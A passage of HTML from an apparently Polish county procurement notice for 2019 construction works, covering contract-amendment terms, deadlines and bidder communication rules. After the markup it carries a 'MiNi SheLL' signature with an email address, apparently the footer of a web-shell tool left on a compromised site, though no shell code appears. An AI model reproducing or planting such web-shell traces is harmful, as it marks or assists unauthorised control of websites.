id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Dopuszcza się możliwość wprowadzenia następujących zmian postanowień zawartej umowy wstosunku do treści oferty: 1) zmiany, o których mowa w umowie w § 4 ust. 4, 5, 9 i 10; § 6 ust. 3-7, § 10ust. 3, § 11 ust. 4-8; § 13 ust. 3, 2) zmiany dotyczą realizacji dodatkowych robót budowlanych oddotychczasowego Wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne izostały spełnione łącznie następujące warunki: a) zmiana Wykonawcy nie może zostać dokonana zpowodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lubinteroperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego, b)zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dlaZamawiającego, c) wartość każdej kolejnej zmiany nie przekracza 50 % wartości zamówienia określonejpierwotnie w umowie; 3) zostały spełnione łącznie następujące warunki: a) konieczność zmiany umowyspowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógłprzewidzieć, b) wartość zmiany nie przekracza 50 % wartości zamówienia określonej pierwotnie wumowie; 4) Wykonawcę, któremu zamawiający udzielił zamówienia, ma zastąpić nowy wykonawca: a) wwyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowegoWykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu,nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmianumowy, b) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jegopodwykonawców; 5) zmiany, niezależnie od ich wartości, nie są istotne w rozumieniu ust. 6; 6) łącznawartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2018 r. poz. 1986 z późn. zm.) -dalej ustawa Pzp i jest mniejsza od 15 % wartości zamówienia określonej pierwotnie w umowie. 2. Wprzypadkach, o których mowa w ust. 1 pkt 2 i 3 oraz pkt 4 lit. a, Zamawiający nie może wprowadzićkolejnych zmian umowy w celu uniknięcia stosowania przepisów ustawy Pzp. 3. W przypadkach, októrych mowa w ust. 1 pkt 1, 3 i 6, zmiany postanowień umownych nie mogą prowadzić do zmianycharakteru umowy. 4. W przypadkach, o których mowa w ust. 1 pkt 2 i 3, Zamawiający, po dokonaniuzmiany umowy, zamieszcza w Biuletynie Zamówień Publicznych ogłoszenie o zmianie umowy. 5. Jeżeliumowa zawiera postanowienia przewidujące możliwość zmiany wynagrodzenia należnego Wykonawcy zpowodu okoliczności innych niż zmiana zakresu świadczenia Wykonawcy, dopuszczalną wartość zmianyumowy, o której mowa w ust. 1 pkt 2 lit. c, pkt 3 lit. b i pkt 6, ustala się w oparciu o wartość zamówieniaokreśloną pierwotnie, z uwzględnieniem zmian wynikających z tych postanowień. 6. Zmianę postanowieńzawartych w umowie uznaje się za istotną, jeżeli: 1) zmienia ogólny charakter umowy, w stosunku docharakteru umowy w pierwotnym brzmieniu, 2) nie zmienia ogólnego charakteru umowy i zachodzi conajmniej jedna z następujących okoliczności: a) zmiana wprowadza warunki, które, gdyby byłypostawione w postępowaniu o udzielenie zamówienia, to w tym postępowaniu wzięliby lub moglibywziąć udział inni wykonawcy lub przyjęto by oferty innej treści, b) zmiana narusza równowagęekonomiczną umowy na korzyść Wykonawcy w sposób nieprzewidziany pierwotnie w umowie, c)zmiana znacznie rozszerza lub zmniejsza zakres świadczeń i zobowiązań wynikających z umowy, d)polega na zastąpieniu Wykonawcy, któremu Zamawiający udzielił zamówienia, nowym wykonawcą, wprzypadkach innych niż wymienione w ust. 1 pkt 4. 7. Harmonogram rzeczowo-finansowy stanowiącyzałącznik do umowy może podlegać zmianom i modyfikacjom w trakcie realizacji przedmiotuzamówienia w zakresie: zmian kolejności realizacji poszczególnych etapów, przesunięć zakresurzeczowego pomiędzy danymi etapami oraz wynikające stąd zmiany wynagrodzenia za dane etapy, orazinne zmiany nie powodujące zmiany wynagrodzenia określonego w ust. 1, z zastrzeżeniem ust. 1-6. 8.Zmiany i modyfikacje harmonogramu nie powodujące zmiany wynagrodzenia określonego w umowie w§ 4 ust. 1 oraz nie powodujące zmiany terminu realizacji przedmiotu zamówienia, o którym mowa w § 6ust. 1, nie wymagają aneksu do umowy. Potwierdzeniem wprowadzenia zmian i modyfikacji będziepodpisanie przez Strony umowy zmienionego lub zmodyfikowanego harmonogramu. 9. Stronydopuszczają możliwość zmiany wysokości wynagrodzenia należnego Wykonawcy, o którym mowa wumowie w § 4 ust. 1, w przypadku ustawowej zmiany stawki podatku od towarów i usług. 10. Zmianawysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia przesłanki, o której mowa wust. 9, będzie odnosić się wyłącznie do części przedmiotu umowy realizowanej, zgodnie z terminamiustalonymi umową, po dniu wejścia w życie przepisów zmieniających stawkę podatku od towarów iusług oraz wyłącznie do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawkipodatku od towarów i usług. 11. Termin realizacji przedmiotu umowy, o którym mowa w umowie § 6 wust. 1, może ulec zmianie w przypadku: 1) wystąpienia robót dodatkowych, których wykonanie wymagadodatkowego nakładu czasu, 2) przestojów (powyżej 7 dni) wynikających z wystąpienia anomaliipogodowych i/lub klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia zgodnie zprocesem technologicznym, jak np.: a) długotrwałe i intensywne opady deszczu; b) oberwania chmury(ulewy), grad bądź wichury (trąby powietrzne), które spowodują szkody na budowie niewynikające zzaniedbań Wykonawcy, a wymagające dodatkowego czasu na ich usunięcie; c) obfite opady śniegu lubspadek temperatury poniżej - 5 stopni C - występujące poza okresem kalendarzowej zimy; 3) przestojówspowodowanych koniecznością usuwania nieumyślnych uszkodzeń istniejących urządzeń,nieoznaczonych w dokumentacji projektowej; 4) wstrzymania, na okres powyżej 7 dni robótbudowlanych z przyczyn nie wynikających z winy Wykonawcy, w szczególności: a) wynikających zopóźnień w udostępnieniu Wykonawcy frontu robót przez Zamawiającego lub Użytkownika obiektu, naktórym prowadzone są roboty budowlane objęte niniejszą umową; b) wynikających z opóźnień wudostępnieniu Wykonawcy frontu robót przez innego wykonawcę realizującego roboty budowlane na tymsamym obiekcie, których wykonanie warunkuje możliwość wykonania robót budowlanych objętychniniejszą umową; c) wynikających z opóźnień w wydawaniu stosownych decyzji administracyjnych,pozwoleń, uzgodnień, opinii, warunków technicznych, itp. dokumentów niezbędnych do prawidłowejrealizacji przedmiotu zamówienia, d) z uwagi na konieczność usunięcia błędów lub wprowadzenia zmianw dokumentacji projektowej, e) w przypadku wystąpienia trudności finansowych u Zamawiającego; f) wprzypadku napotkania na niewybuchy, niewypały lub obiekty o znaczeniu historycznym; 5) pojawieniasię na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztówrealizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy; 6) koniecznościzrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub technologicznych niżwskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, wsytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwymwykonaniem przedmiotu umowy; 7) zaistnienia siły wyższej. 12. Pod pojęciem siły wyższej Stronyrozumieją okoliczności, które pomimo zachowania należytej staranności i podjęcia wszelkich działań wnormalnym zakresie, nie mogą być przez Strony przewidziane oraz którym Strony nie mogą zapobiec,bądź się im przeciwstawić w sposób skuteczny. 13. W przypadkach określonych w ust. 11, Zamawiającywyznacza nowy termin realizacji zamówienia. W przypadku wstrzymania robót, okres przesunięciaterminu zakończenia zadania równy będzie okresowi na jaki roboty budowlane zostały wstrzymane. 14.Zmiany terminu realizacji przedmiotu zamówienia, o którym mowa w umowie § 6 ust. 1, wynikające zprzyczyn określonych w ust. 11, zostaną dokonane na podstawie pisemnego uzasadnienia zmianzatwierdzonego przez Zamawiającego oraz wymagają aneksu w formie pisemnej pod rygoremnieważności, z zastrzeżeniem postanowienia ust. 15. 15. W przypadku, gdy zmiana terminu realizacjiprzedmiotu umowy, o której mowa w ust. 6, wymagała będzie zgody dysponenta środków finansowych zjakich inwestycja jest dofinansowywana, o których mowa w umowie w § 1 ust. 2 - warunkiemwprowadzenia zmiany będzie uzyskanie takiej zgody. 16. W trakcie realizacji umowy Wykonawca możedokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w art. 148 ust. 1 ustawyPzp. 17. Zmiana w trakcie realizacji przedmiotu niniejszej umowy, którejkolwiek z osób wskazanych wumowie w § 11 ust. 3, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnegozaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od datyprzedłożenia propozycji i wyłącznie wtedy, gdy kwalifikacje nowo wskazywanej osoby będą takie samelub wyższe od kwalifikacji wymaganych do pełnienia tej funkcji postanowieniami specyfikacji istotnychwarunków zamówienia. 18. Wykonawca musi przedłożyć Zamawiającemu propozycję zmiany, o którejmowa w ust. 17 nie później niż 7 dni przed planowanym skierowaniem do kierowania robotamiogólnobudowlanymi i/lub sanitarnymi, innej osoby. Jakakolwiek przerwa w realizacji przedmiotu umowywynikająca z braku kierownika robót ogólnobudowlanych i/lub sanitarnych, będzie traktowana jakoprzerwa wynikająca z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmianyterminu realizacji przedmiotu zamówienia, z zastrzeżeniem postanowień ust. 19. 19. Postanowienia ust.18 nie dotyczą sytuacji losowych, np. niezdolności do pracy kierownika robót ogólnobudowlanych lubsanitarnych. 20. Skierowanie, bez akceptacji Zamawiającego, do kierowania robotamiogólnobudowlanymi i/lub sanitarnymi, innej osoby niż wskazana w ofercie Wykonawcy, bądź uprzedniozaakceptowana przez Zamawiającego, może stanowić podstawę do odstąpienia od umowy z winyWykonawcy. 21. Zaakceptowana przez Zamawiającego zmiana którejkolwiek z osób, o których mowa wumowie w § 11 ust. 3, nie wymaga aneksu do niniejszej umowy. 22. Jeżeli zmiana albo rezygnacja zpodwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadachokreślonych w art. 22a ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału wpostępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany innypodwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, naktórego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-04-08</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">1. Komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem operatorapocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe, osobiście, zapośrednictwem posłańca, faksu lub przy użyciu środków komunikacji elektronicznej w rozumieniuustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, z zastrzeżeniem postanowieniaust. 3. 2. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia orazinformacje za pośrednictwem faksu lub przy użyciu środków komunikacji elektronicznej w rozumieniuustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, każda ze stron na żądanie drugiejstrony niezwłocznie potwierdza fakt ich otrzymania. 3. Ofertę oraz oświadczenia, o których mowa w art.25a ust. 1 ustawy Pzp (§ 6a siwz ust. 1.1. - 1.3. siwz) - zał. nr 2 i 2a do siwz, należy złożyć pod rygoremnieważności, w formie pisemnej. 4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienietreści specyfikacji istotnych warunków zamówienia. Zamawiający jest obowiązany udzielić wyjaśnieńniezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem żewniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął do Zamawiającegonie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert, tj. dodnia 29.03.2019 r. 5. Jeżeli wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówieniawpłynął po upływie terminu składania wniosków, o którym mowa w ust. 4, lub dotyczy udzielonychwyjaśnień, Zamawiający może udzielić wyjaśnień, albo pozostawić wniosek bez rozpatrzenia. 6.Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku, o którym mowa wust. 4. 7. Zamawiający jednocześnie przekaże treść zapytań wraz z wyjaśnieniami wszystkimwykonawcom, którym przekazano siwz, bez ujawniania źródła zapytania oraz zamieszcza ich treść nastronie internetowej http://bip.powiat.ostroda.pl. 8. W uzasadnionych przypadkach Zamawiający możeprzed upływem terminu składania ofert zmienić treść siwz. Dokonaną zmianę treści siwz Zamawiającyudostępni na stronie internetowej. 9. Jeśli zmiana treści siwz prowadzić będzie do zmiany treściogłoszenia o zamówieniu Zamawiający zamieści ogłoszenie o zmianie ogłoszenia w BiuletynieZamówień Publicznych. 10. Wykonawca, którego oferta zostanie wybrana, do dnia podpisania umowy,wniesie zabezpieczenie należytego wykonania umowy w wysokości stanowiącej 5 % ceny ofertowej. 11.Zabezpieczenie musi być wniesione w jednej lub kilku formach dopuszczonych ustawą Pzp, zgodnie zart. 148 ust. 1, tj. w: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasyoszczędnościowo-kredytowej (z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym),gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, októrych mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej AgencjiRozwoju Przedsiębiorczości. 12. Wykonawca może powierzyć wykonanie części zamówieniapodwykonawcy. 13. Zamawiający nie zastrzega, na podstawie art. 36a ust. 2 pkt 1 ustawy Pzp, obowiązkuosobistego wykonania kluczowych części zamówienia przez Wykonawcę. 14. Zamawiający żąda, abyprzed przystąpieniem do wykonywania zamówienia Wykonawca, o ile są już znane, podał nazwy alboimiona i nazwiska oraz dane kontaktowe podwykonawców i osób do kontaktu z nimi, zaangażowanych wrealizację robót budowlanych objętych przedmiotem zamówienia. Wykonawca zawiadamiaZamawiającego o wszelkich zmianach danych, o których mowa w zdaniu pierwszym, w trakcie realizacjizamówienia, a także przekazuje informacje na temat nowych podwykonawców, którym w późniejszymokresie zamierza powierzyć realizację robót budowlanych. 15. Obowiązku informacyjnego wynikającegoz art. 13 RODO dokonano w § 34 siwz.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com